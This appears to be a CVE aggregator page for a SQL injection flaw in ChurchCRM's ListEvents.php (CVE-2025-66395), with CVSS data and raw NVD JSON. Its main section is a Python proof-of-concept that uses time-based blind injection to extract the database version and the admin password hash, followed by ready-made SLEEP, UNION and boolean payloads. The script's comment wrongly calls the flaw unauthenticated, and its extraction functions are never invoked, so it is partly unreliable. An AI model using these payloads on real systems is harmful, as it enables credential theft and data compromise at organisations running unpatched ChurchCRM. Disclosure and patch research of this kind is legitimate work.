Security Vulnerability Report
中文
CVE-2025-66395 CVSS 8.8 HIGH

CVE-2025-66395

Published: 2025-12-17 19:16:12
Last Modified: 2025-12-18 19:08:38
Source: [email protected]

Description

ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time # CVE-2025-66395 ChurchCRM SQL Injection PoC # Target: ChurchCRM < 6.5.3 # Vulnerability: Unauthenticated SQL injection via WhichType parameter in src/ListEvents.php target_url = "http://target-server/churchrm/src/ListEvents.php" login_url = "http://target-server/churchrm/src/Login.php" # Step 1: Authenticate with valid credentials session = requests.Session() login_data = { "UserBoxEntry": "[email protected]", "Password": "password123" } session.post(login_url, data=login_data) # Step 2: Test basic SQL injection with time-based blind technique def test_sql_injection(session, payload, expected_delay=5): """Test SQL injection with time-based blind technique""" start_time = time.time() data = { "WhichType": payload, "FilterName": "", "Mode": "Past" } response = session.post(target_url, data=data, timeout=30) elapsed = time.time() - start_time return elapsed >= expected_delay # Step 3: Extract database version using blind SQL injection def extract_db_version(session): """Extract database version via time-based blind SQL injection""" version = "" charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._-" for pos in range(1, 50): found = False for char in charset: payload = f"1 AND (SELECT CASE WHEN (SUBSTRING(@@version,{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)" if test_sql_injection(session, payload, expected_delay=3): version += char found = True print(f"[+] Position {pos}: {char}") break if not found: break return version # Step 4: Extract admin credentials def extract_admin_hash(session): """Extract admin password hash from user table""" hash_value = "" charset = "0123456789ABCDEFabcdef" for pos in range(1, 65): for char in charset: payload = f"1 AND (SELECT CASE WHEN (SUBSTRING((SELECT password FROM user_perms WHERE id=1),{pos},1)='{char}') THEN SLEEP(3) ELSE 0 END)" if test_sql_injection(session, payload, expected_delay=3): hash_value += char print(f"[*] Extracting hash position {pos}: {char}") break return hash_value # Example payloads for manual testing: # Time-based blind: WhichType=1 AND (SELECT * FROM (SELECT(SLEEP(5)))a) # Union-based: WhichType=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- # Boolean-based: WhichType=1 AND 1=1 print("[*] CVE-2025-66395 ChurchCRM SQL Injection PoC") print("[*] Target: ChurchCRM < 6.5.3") print("[*] Testing authenticated SQL injection via WhichType parameter")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66395", "sourceIdentifier": "[email protected]", "published": "2025-12-17T19:16:11.807", "lastModified": "2025-12-18T19:08:38.293", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/ListEvents.php` file. When filtering events by type, the `WhichType` POST parameter is not properly sanitized or type-casted before being used in multiple SQL queries. This allows any authenticated user to execute arbitrary SQL commands, including time-based blind SQL injection attacks. Any authenticated user, regardless of their privilege level, can execute arbitrary queries on the database. This could allow them to exfiltrate, modify, or delete any data in the database, including user credentials, financial data, and personal information, leading to a full compromise of the application's data. Version 6.5.3 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-c9xf-f3gr-xfwv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.